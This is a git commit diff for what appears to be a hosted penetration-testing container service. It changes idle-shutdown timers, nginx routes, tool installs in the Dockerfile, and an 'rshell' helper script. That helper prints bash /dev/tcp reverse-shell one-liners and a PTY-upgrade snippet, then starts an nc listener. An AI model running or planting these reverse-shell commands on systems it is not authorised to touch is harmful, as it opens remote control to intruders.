guest docker bumping

2024-01-20 20:44:05 +00:00 · 2024-01-20 20:44:05 +00:00 · 44f0018fff
parent fc10201e80
commit 44f0018fff
21 changed files with 324 additions and 264 deletions
--- a/5
+++ b/5
@ -1,7 +1,10 @@
 0.5.4 - 2023-02-00
+    * OpenSSH 9.6p1
    * rshell
    * sploitscan
-    * OpenVPN (curl sf/vpn)
+    * OpenVPN (curl sf/ovpn)
+    * Different auto-shutdown timers for FREE and TOKEN users
+    * Syscop login message after auto-shutdown

 0.5.2 - 2023-12-00
    * Kali 2023.4
--- a/4
+++ b/4
@ -119,6 +119,7 @@ FILES_PROVISION += "segfault-$(VER)/provision/update.sh"
 FILES_ENCFSD += "segfault-$(VER)/encfsd/Makefile"
 FILES_ENCFSD += "segfault-$(VER)/encfsd/Dockerfile"
 FILES_ENCFSD += "segfault-$(VER)/encfsd/destructor.sh"
+FILES_ENCFSD += "segfault-$(VER)/encfsd/funcs_destructor.sh"
 FILES_ENCFSD += "segfault-$(VER)/encfsd/encfsd.sh"
 FILES_ENCFSD += "segfault-$(VER)/encfsd/portd.sh"

@ -137,6 +138,7 @@ FILES_GSNC += "segfault-$(VER)/gsnc/sf-gsnc.sh"
 FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx.conf"
 FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx-rpc.conf"
 FILES_CONFIG += "segfault-$(VER)/config/etc/sf/sf.conf"
+FILES_CONFIG += "segfault-$(VER)/config/etc/sf/timers.conf"
 FILES_CONFIG += "segfault-$(VER)/config/etc/redis/redis.conf"
 FILES_CONFIG += "segfault-$(VER)/config/etc/sf/WARNING---SHARED-BETWEEN-ALL-SERVERS---README.txt"
 FILES_CONFIG += "segfault-$(VER)/config/etc/resolv.conf"
@ -156,7 +158,7 @@ FILES_ROOT += "segfault-$(VER)/sfbin/funcs.sh"
 FILES_ROOT += "segfault-$(VER)/sfbin/funcs_redis.sh"
 FILES_ROOT += "segfault-$(VER)/sfbin/funcs_admin.sh"
 FILES_ROOT += "segfault-$(VER)/sfbin/funcs_net.sh"
-FILES_ROOT += "segfault-$(VER)/sfbin/funcs_vpn.sh"
+FILES_ROOT += "segfault-$(VER)/sfbin/funcs_ovpn.sh"
 FILES_ROOT += "segfault-$(VER)/sfbin/ovpn_up.sh"
 FILES_ROOT += "segfault-$(VER)/sfbin/sf"
 FILES_ROOT += "segfault-$(VER)/sfbin/banhammer.sh"
--- a/config/etc/nginx/nginx-rpc.conf
+++ b/config/etc/nginx/nginx-rpc.conf
@ -69,13 +69,15 @@ http {
 		gzip off;

 		location / {
-			try_files $uri $uri/ = 404;
-			rewrite /net   /net/;
-			rewrite /vpn   /vpn/;
-			rewrite /wg    /wg/;
-			rewrite /dmesg /dmesg/;
-			rewrite /port  /port/;
-			rewrite /set   /set/;
+			#try_files $uri $uri/ = 404;
+			rewrite ^/net$   /net/ last;
+			rewrite ^/ovpn$  /ovpn/ last;
+			rewrite ^/vpn$   /ovpn/ last;
+			rewrite ^/wg$    /wg/ last;
+			rewrite ^/dmesg$ /dmesg/ last;
+			rewrite ^/port$  /port/ last;
+			rewrite ^/set$   /set/ last;
+			rewrite ^/vpn/(.*)$  /ovpn/$1 last;

 			location ~* ^/set/.* {
 				fastcgi_param REMOTE_ADDR        $remote_addr;
@ -101,11 +103,11 @@ http {
 				fastcgi_param SCRIPT_FILENAME    /cgi-bin/rpc;
 				fastcgi_pass  unix:/dev/shm/sf/master/fcgiwrap.socket;
 			}
-			location ~* ^/vpn/.* {
+			location ~* ^/ovpn/.* {
 				fastcgi_param REMOTE_ADDR        $remote_addr;
 				fastcgi_param REQUEST_URI        $request_uri;
 				fastcgi_param REQUEST_BODY       $request_body;
-				fastcgi_param FCGI_CMD           vpn;
+				fastcgi_param FCGI_CMD           ovpn;
 				fastcgi_param SCRIPT_FILENAME    /cgi-bin/rpc;
 				fastcgi_pass  unix:/dev/shm/sf/master/fcgiwrap.socket;
 			}
--- a/config/etc/sf/timers.conf
+++ b/config/etc/sf/timers.conf
@ -0,0 +1,6 @@
+#SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
+#SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
+#SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
+#SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
+
+
--- a/docker-compose.yml
+++ b/docker-compose.yml
@ -40,7 +40,7 @@ services:
    devices:
      - "/dev/fuse:/dev/fuse"
    volumes:
-      - "${SF_BASEDIR:-.}/config/db:/config/db:ro"
+      - "${SF_BASEDIR:-.}/config/db:/config/db:rw"
      - "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
      - "${SF_BASEDIR:-.}/data:/encfs/raw"
      - "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
@ -76,6 +76,7 @@ services:
      - "/dev/fuse:/dev/fuse"
    volumes:
      - "${SF_BASEDIR:-.}/config/db:/config/db:ro"
+      - "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro"
      - "${SF_BASEDIR:-.}/data:/encfs/raw"
      - "${SF_SHMDIR:-/dev/shm/sf}/self-for-guest:/config/self-for-guest"
      - "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared"
--- a/encfsd/Dockerfile
+++ b/encfsd/Dockerfile
@ -9,4 +9,4 @@ RUN apk add --no-cache --upgrade \
 		encfs \
 		redis \
 		xfsprogs-extra
-COPY destructor.sh encfsd.sh portd.sh /
+COPY destructor.sh funcs_destructor.sh encfsd.sh portd.sh /
--- a/encfsd/destructor.sh
+++ b/encfsd/destructor.sh
@ -3,149 +3,28 @@
 # shellcheck disable=SC1091 # Do not follow
 source /sf/bin/funcs.sh
 source /sf/bin/funcs_redis.sh
-		
-SF_TIMEOUT_WITH_SHELL=604800
-SF_TIMEOUT_NO_SHELL=129600
+
+# Defaults		
+SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36))
+SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1))
+SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7))
+SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36))
 [[ -n $SF_DEBUG ]] && {
-	SF_TIMEOUT_WITH_SHELL=180
-	SF_TIMEOUT_NO_SHELL=120
-}
-
-# [LID] <1=encfs> <1=Container> <message>
-# Either parameter can be "" to not stop encfs or lg-container 
-stop_lg()
-{
-	local is_encfs
-	local is_container
-	local lid
-	local ts_born
-	lid="$1"
-	ts_born="$2"
-	is_encfs="$3"
-	is_container="$4"
-
-	LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
-
-	red RPUSH portd:cmd "remport ${lid}" >/dev/null
-	rm -f "/sf/run/encfsd/user/lg-${lid}"
-	rm -f "/sf/run/pids/lg-${lid}.pid"
-	rm -f "/sf/run/ips/lg-${lid}.ip"
-	rm -rf "/config/self-for-guest/lg-${lid}"
-	rm -rf "/sf/run/users/lg-${lid}"
-
-	# Kill the OpenVPN process (if running)
-	docker exec sf-master killall "openvpn-$lid" 2>/dev/null
-	docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null 
-
-	# Tear down container
-	[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
-
-	# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
-	# inside the container even that we never moved it into the container's
-	# Process Namespace. EncFS will also die when the lg- is shut down.
-	# This is only neede for cgroup1:
-	[[ -n $is_encfs ]] && {
-		pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
-		# Give kernel time to unmount mountpoint
-		sleep 1
-	}
-	# Do not use 'rm -rf' here as this might still be a mounted drive
-	# when encfsd is not killed fast enough (failing to delete is acceptable).
-	rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
-	rmdir "/encfs/sec/lg-${lid}"
-}
-
-# [lg-$LID]
-# Check if lg- is running and
-# 1. EncFS died
-# 2. Container should be stopped (stale, idle)
-check_container()
-{
-	local c
-	local lid
-	local i
-	local IFS
-	local fn
-	local comm
-	local ts_logout
-	local ts_born
-	IFS=$'\n'
-
-	c="$1"
-	lid="${c#lg-}"
-
-	[[ ${#lid} -ne 10 ]] && return
-
-	ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
-	# Skip if EncFS only started recently (zsh not yet started).
-	[[ $((NOW - ts_born)) -lt 20 ]] && return 0
-
-	# Check if EncFS is still running.
-	pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
-		# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
-		stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
-		return
-	}
-
-	# ts_logout may not exist (stale)
-	ts_logout=0
-	fn="/config/db/user/lg-${lid}/ts_logout"
-	[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn") 
-
-	# Check if there is still a shell running inside the container:
-	IFS=""
-	set -o pipefail
-	comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
-		# HERE: lg died or top failed.
-		set +o pipefail
-		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
-		return
-	}
-	set +o pipefail
-	# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
-	# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
-	# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
-	
-	# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
-	# FIXME: many stale is_logged_in exists without ssh connected ;/
-
-	# HERE: LG & EncFS are running.
-	echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
-		# HERE: User still has shell running
-		[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
-		[[ $((NOW - ts_logout)) -lt ${SF_TIMEOUT_WITH_SHELL} ]] && return
-		# HERE: Not logged in. logged out more than 1 week ago.
-
-		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
-		return
-	}
-	# HERE: No shell running, ts_logout=0 if never logged out
-
-	# Skip if only recently logged out.
-	[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
-
-	# Filter out stale processes
-	echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
-		# HERE: Nothing running but stale processes
-		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
-		return
-	}
-	# HERE: Something running (but no shell, and no known processes)
-
-	[[ $((NOW - ts_logout)) -ge ${SF_TIMEOUT_NO_SHELL} ]] && {
-		# User logged out 1.5 days ago. No shell. No known processes.
-		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${SF_TIMEOUT_NO_SHELL}sec (no shell running)."
-		return
-	}
-
-	# HERE: No shell. No known processes. Less than 1.5 days ago.
+	SF_TIMEOUT_WITH_SHELL=60
+	SF_TIMEOUT_NO_SHELL=15
+	SF_TIMEOUT_TOKEN_WITH_SHELL=120
+	SF_TIMEOUT_TOKEN_NO_SHELL=90
 }

 [[ ! -S /var/run/docker.sock ]] && ERREXIT 255 "Not found: /var/run/docker.sock"
+source /funcs_destructor.sh || ERREXIT 255
+
 export REDISCLI_AUTH="${SF_REDIS_AUTH}"

 while :; do
 	sleep 30
+	source /config/etc/sf/timers.conf 2>/dev/null
+	source /funcs_destructor.sh 2>/dev/null
 	NOW=$(date +%s)
 	# Every 30 seconds check all container we are tracking (from encfsd)
 	containers=($(cd /sf/run/encfsd/user && echo lg-*))
--- a/encfsd/funcs_destructor.sh
+++ b/encfsd/funcs_destructor.sh
@ -0,0 +1,153 @@
+
+# [LID] <1=encfs> <1=Container> <message>
+# Either parameter can be "" to not stop encfs or lg-container 
+stop_lg()
+{
+	local is_encfs
+	local is_container
+	local lid
+	local ts_born
+	lid="$1"
+	ts_born="$2"
+	is_encfs="$3"
+	is_container="$4"
+
+	LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5"
+
+	red RPUSH portd:cmd "remport ${lid}" >/dev/null
+	rm -f "/sf/run/encfsd/user/lg-${lid}"
+	rm -f "/sf/run/pids/lg-${lid}.pid"
+	rm -f "/sf/run/ips/lg-${lid}.ip"
+	rm -rf "/config/self-for-guest/lg-${lid}"
+	rm -rf "/sf/run/users/lg-${lid}"
+
+	# Kill the OpenVPN process (if running)
+	docker exec sf-master killall "openvpn-$lid" 2>/dev/null
+	docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null 
+
+	# Tear down container
+	[[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill
+
+	# Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running
+	# inside the container even that we never moved it into the container's
+	# Process Namespace. EncFS will also die when the lg- is shut down.
+	# This is only neede for cgroup1:
+	[[ -n $is_encfs ]] && {
+		pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null
+		# Give kernel time to unmount mountpoint
+		sleep 1
+	}
+	# Do not use 'rm -rf' here as this might still be a mounted drive
+	# when encfsd is not killed fast enough (failing to delete is acceptable).
+	rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt"
+	rmdir "/encfs/sec/lg-${lid}"
+}
+
+try_syscop_msg() {
+	local lid="$1"
+	echo -en "\
+🤷‍♂️ ${CDM}Your server shut down automatically because you did not log in for $(( (NOW - ts_logout) / 60 / 60 )) h.
+🫵 Please type ${CDC}halt${CDM} to stop your server or...
+❤️  ...get a ${CM}TOKEN${CDM} to stop this message: ${CUL}${CB}https://thc.org/sf/token${CN}${CDM}
+
+🌈 ${CW}Yours sincerely, The SysCops 😘 ${CN}
+">"/config/db/user/lg-${lid:?}/syscop-msg.txt"
+}
+
+# [lg-$LID]
+# Check if lg- is running and
+# 1. EncFS died
+# 2. Container should be stopped (stale, idle)
+check_container()
+{
+	local c
+	local lid
+	local IFS=$'\n'
+	local fn
+	local comm
+	local ts_logout
+	local ts_born
+	local to_with_shell=$SF_TIMEOUT_WITH_SHELL
+	local to_no_shell=$SF_TIMEOUT_NO_SHELL
+	local is_token
+
+	c="$1"
+	lid="${c#lg-}"
+
+	[[ ${#lid} -ne 10 ]] && return
+
+	ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; }
+	# Skip if EncFS only started recently (zsh not yet started).
+	[[ $((NOW - ts_born)) -lt 20 ]] && return 0
+
+	# Check if EncFS is still running.
+	pgrep -f "^\[encfs-${lid}\]" &>/dev/null || {
+		# NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop')
+		stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..."
+		return
+	}
+
+	# ts_logout may not exist (stale)
+	ts_logout=0
+	fn="/config/db/user/lg-${lid}/ts_logout"
+	[[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn") 
+
+	# Check if there is still a shell running inside the container:
+	IFS=""
+	set -o pipefail
+	comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || {
+		# HERE: lg died or top failed.
+		set +o pipefail
+		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running."
+		return
+	}
+
+	# Load timers
+	[[ -e "/config/db/user/lg-${lid}/token" ]] && {
+		to_with_shell=$SF_TIMEOUT_TOKEN_WITH_SHELL
+		to_no_shell=$SF_TIMEOUT_TOKEN_NO_SHELL
+		is_token=1
+	}
+	set +o pipefail
+	# Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare
+	# condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo
+	# will receive a SIGPIPE and exit with 141 and the entire pipe will fail.
+	
+	# [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
+	# FIXME: many stale is_logged_in exists without ssh connected ;/
+
+	# HERE: LG & EncFS are running.
+	echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && {
+		# HERE: User still has shell running
+		[[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return
+		[[ $((NOW - ts_logout)) -lt ${to_with_shell} ]] && return
+		# HERE: Not logged in. logged out more than 1 week ago.
+		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)."
+		[[ -z $is_token ]] && try_syscop_msg "$lid"
+
+		return
+	}
+	# HERE: No shell running, ts_logout=0 if never logged out
+
+	# Skip if only recently logged out.
+	[[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out.
+
+	# Filter out stale processes
+	echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || {
+		# HERE: Nothing running but stale processes
+		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running."
+		return
+	}
+	# HERE: Something running (but no shell, and no known processes)
+
+	[[ $((NOW - ts_logout)) -ge ${to_no_shell} ]] && {
+		# User logged out 1.5 days ago. No shell. No known processes.
+
+		stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${to_no_shell}sec (no shell running)."
+		[[ -z $is_token ]] && try_syscop_msg "$lid"
+
+		return
+	}
+
+	# HERE: No shell. No known processes. Less than 1.5 days ago.
+}
--- a/guest/Dockerfile
+++ b/guest/Dockerfile
@ -614,11 +614,11 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
 	&& /pkg-install.sh HACK ghbin 'theaog/spirit' 'spirit%arch:x86_64=:DEFAULT=SKIP%.tgz$' spirit   `# x86_64 only, spirit-arm bad` \
 	&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/gf@latest \
 		&& mkdir -p /usr/share/gf \
-		&& svn export https://github.com/tomnomnom/gf/trunk /tmp/gf \
+		&& git clone --depth 1 https://github.com/tomnomnom/gf.git /tmp/gf \
 		&& mv /tmp/gf/examples/*.json /usr/share/gf \
 		&& mv /tmp/gf/gf-completion.* /usr/share/gf \
 		&& rm -rf /tmp/gf \
-		&& svn export https://github.com/1ndianl33t/Gf-Patterns/trunk/ /tmp/gf \
+		&& git clone --depth 1 https://github.com/1ndianl33t/Gf-Patterns.git /tmp/gf \
 		&& mv /tmp/gf/*.json /usr/share/gf; }' \
 	&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/hacks/inscope@latest; }' \
 	&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/Emoe/kxss@latest; }' \
@ -631,7 +631,8 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6
 		&& cmake . \
 		&& make \
 		&& cp urldedupe /usr/bin; }' \
-	&& /pkg-install.sh HACK bash -c '{ svn export https://github.com/urbanadventurer/username-anarchy/trunk /opt/username-anarchy; }' \
+	&& /pkg-install.sh HACK bash -c '{ git clone --depth 1 https://github.com/urbanadventurer/username-anarchy.git /opt/username-anarchy \
+		&&  rm -rf /opt/username-anarchy/.git*; }' \
 	&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/damit5/gitdorks_go@latest; }' \
 	&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/dsieve@master; }' \
 	&& /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/enumerepo@latest; }' \
@ -802,8 +803,8 @@ RUN /pkg-install.sh HACK ghbin ekzhang/bore  '%arch:aarch64=arm%-unknown-linux'
 	&& /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb'            `# x86_64 only` \
 	&& /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py'                    sploitscan \
 	&& /pkg-install.sh HACK ghbin hueristiq/xurlfind3r               'linux_%arch:x86_64=amd64:aarch64=arm64%'   xurlfind3r
-RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker                       'linux'                                     kalker \
-	&& /pkg-install.sh LARGE ghbin PowerShell/PowerShell  'deb_%arch1%.deb'
+RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker                       'linux'                                     kalker
+ ## YANKED. Already in apt-get install powershell/pkg-install.sh LARGE ghbin PowerShell/PowerShell  'deb_%arch1%.deb'
 RUN	/pkg-install.sh HACK bash -c '{  wget -O "/usr/bin/favfreak.py" https://raw.githubusercontent.com/devanshbatham/FavFreak/master/favfreak.py \
 		&& chmod 755 /usr/bin/favfreak.py \
 		&& ln -s favfreak.py /usr/bin/FavFreak; }' \
--- a/guest/fs-root/etc/shellrc
+++ b/guest/fs-root/etc/shellrc
@ -293,8 +293,10 @@ alias nocol=noansi
 # Make the Project name visibile in the PS1 prompt
 [[ -z $VIRTUAL_ENV ]] && VIRTUAL_ENV="${SF_PRJ}"

-PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:$PATH"
+
+PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:/usr/local/go/bin:$PATH"
 [[ -d /usr/share/doc/python3-impacket/examples ]] && PATH="${PATH}:/usr/share/doc/python3-impacket/examples"
+export PATH

 _sf_info_non_perm()
 {
--- a/guest/fs-root/sf/bin/rshell
+++ b/guest/fs-root/sf/bin/rshell
@ -16,31 +16,31 @@ ERREXIT() {
    exit "${code:-99}"
 }

+[[ ! -f /config/self/reverse_port ]] && curl sf/port
 load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
 load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}."
 echo -e "\
-Use any of these commands on the remote system:${CDR}
-    bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'
-    (bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &
-${CN}
-Once connected, cut & paste this into the remote shell:${CDC}
+Use one of these commands on the remote system:
+    1. ${CDR}bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'${CN}
+    2. ${CDR}(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &${CN}
+${CN}Once connected, cut & paste the following into the _this_ shell:
+${CF}-------------------------------------------------------------------------------${CDC}
 command -v python >/dev/null \\
-  && exec python -c 'import pty; pty.spawn(\"bash\")' \\
-  || exec script -qc bash /dev/null
-
-export SHELL=/bin/bash
-export TERM=xterm-256color
+    && exec python -c 'import pty; pty.spawn(\"bash\")' \\
+    || exec script -qc bash /dev/null
+export SHELL=/bin/bash TERM=xterm-256color
 reset -I
 PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"'
 "'stty -echo;printf "\\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '"'"'{ printf "rows "$3" cols "$2; }'"'"')'"
-${CN}To force-exit this shell, type ${CDY}kill \"\$(pgrep -P $$)\"${CN}
-----------------------------------"
+${CN}${CF}-------------------------------------------------------------------------------${CN}
+To force-exit this listener, type ${CDY}kill \"\$(pgrep -P $$)\"${CN} on your Root Server"
 # PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] '

 cfg=$(stty --save)
 stty raw  -echo opost
-time nc -vnlp "$rport"
-echo "Restoring TTY"
+echo -e "${CDG}Listening on ${CG}${rip}:${rport}${CN}"
+nc -nlp "$rport"
+echo "🦋 Restoring terminal..."
 stty "$cfg"
 # reset -I

--- a/host/Makefile
+++ b/host/Makefile
@ -1,29 +1,34 @@
+
+VER=9.6p1
+
 all: albuild fs-root/bin/docker-exec-sigproxy fs-root/bin/unix-socket-client fs-root/usr/sbin/sshd Dockerfile
 	docker build --no-cache --network host -t sf-host .

 albuild:
-	bash -c "docker run --rm alpine-gcc true || \
-		docker commit alpine-gcc alpine-gcc || { \
-		docker run --network host --name alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \
-		&& docker commit alpine-gcc alpine-gcc; }"
+	bash -c "docker run --rm sf-alpine-gcc true || \
+		docker commit sf-alpine-gcc sf-alpine-gcc || { \
+		docker run --network host --name sf-alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \
+		&& docker commit sf-alpine-gcc sf-alpine-gcc; }"

 # See mk_sshd.sh for manual debugging
-fs-root/usr/sbin/sshd: sf-sshd.patch mk_sshd.sh
-	docker run --rm -v$$(pwd):/src --net=host -w /tmp alpine-gcc /src/mk_sshd.sh
+fs-root/usr/sbin/sshd: albuild sf-sshd.patch mk_sshd.sh
+	docker run --rm -v$$(pwd):/src --net=host -w /tmp --env VER=$(VER) sf-alpine-gcc /src/mk_sshd.sh
+	@echo "Type 'make diff' to create a sf-sshd-$(VER).patch"

 fs-root/bin/docker-exec-sigproxy: docker-exec-sigproxy.c
-	docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c
+	docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c
 	@echo SUCCESS

 fs-root/bin/unix-socket-client: unix-socket-client.c
-	docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c
+	docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c
 	@echo SUCCESS

 diff:
 	cd dev && \
-	diff -x '!*.[ch]' -u   openssh-9.2p1-orig/  openssh-9.2p1-sf/  | grep -Ev ^"(Only in|Common)" >../sf-sshd.patch
+	diff -x '!*.[ch]' -u   openssh-$(VER)-orig/  openssh-$(VER)-sf/  | grep -Ev ^"(Only in|Common)" >../sf-sshd-$(VER).patch
+	@echo "May want to 'mv sf-sshd-$(VER).patch sf-sshd.patch'."

 clean:
-	rm -rf openssh-9.2p1-sf fs-root/usr/sbin/sshd
-	docker image rm alpine-gcc
+	rm -rf openssh-$(VER)-orig openssh-$(VER)-sf fs-root/usr/sbin/sshd
+	docker image rm sf-alpine-gcc

--- a/host/fs-root/bin/segfaultsh
+++ b/host/fs-root/bin/segfaultsh
@ -424,7 +424,7 @@ print_goodbye()

 	# Restricted shell (-r) wont let us redirect stderr - use a bash-exec trick
 	# Note: pgrep is executed in user's context. Treat the output with care and do not trust it.
-	n=$(bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1)
+	n=$(timeout 2 bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1)
 	[[ -z "$n" ]] && n=0
 	[[ ${#n} -gt 5 ]] && n=0
 	[[ ! $n -eq $n ]] && n=0
@ -435,7 +435,7 @@ print_goodbye()
 		str="process is"
 		[[ "$n" -gt 1 ]] && str="processes are"
 		echo -e "${CY}WARNING: ${CR}${n}${CY} ${str} still running:${CN}"
-		exec_errnull docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *}        "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done
+		exec_errnull timeout 2 docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *}        "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done
 		echo -e "\
 -------> The encrypted filesystem in /sec will remain accessible until
 -------> the last shell exits or all background processes terminate.
@ -443,16 +443,6 @@ print_goodbye()
 -------> This will also make /sec unavailabe until your next log in."
 	fi
 	echo -en "\r"
-	[[ -z $SF_IS_PAYING ]] && {
-		echo -e "\
-${CDY}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-@@@   ${CDG}** GET MORE MEMORY, SPEED, STORAGE AND NO RESTRICTIONS **${CDY}   @@@
-@@@             ${CDR}${CUL}https://www.thc.org/segfault/free${CN}${CDY}                 @@@
-@@@             ${CB}${CUL}https://www.thc.org/segfault/upgrade${CN}${CDY}              @@@
-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@${CN}"
-
-	}
-
 	sysmsg "/config/host/etc/logoutmsg-all.sh"

 	echo -e "\
@ -536,7 +526,7 @@ spawn_shell_exit()
 	tofile "${YOUR_IP:?}" "${SF_RUN_DIR}/ips/lg-${LID}.ip"
 	[[ -n $YOUR_GEOIP ]] && tofile "${YOUR_GEOIP}" "/config/self-for-guest/lg-${LID}/geoip"
 	# Request a reverse Port Forward
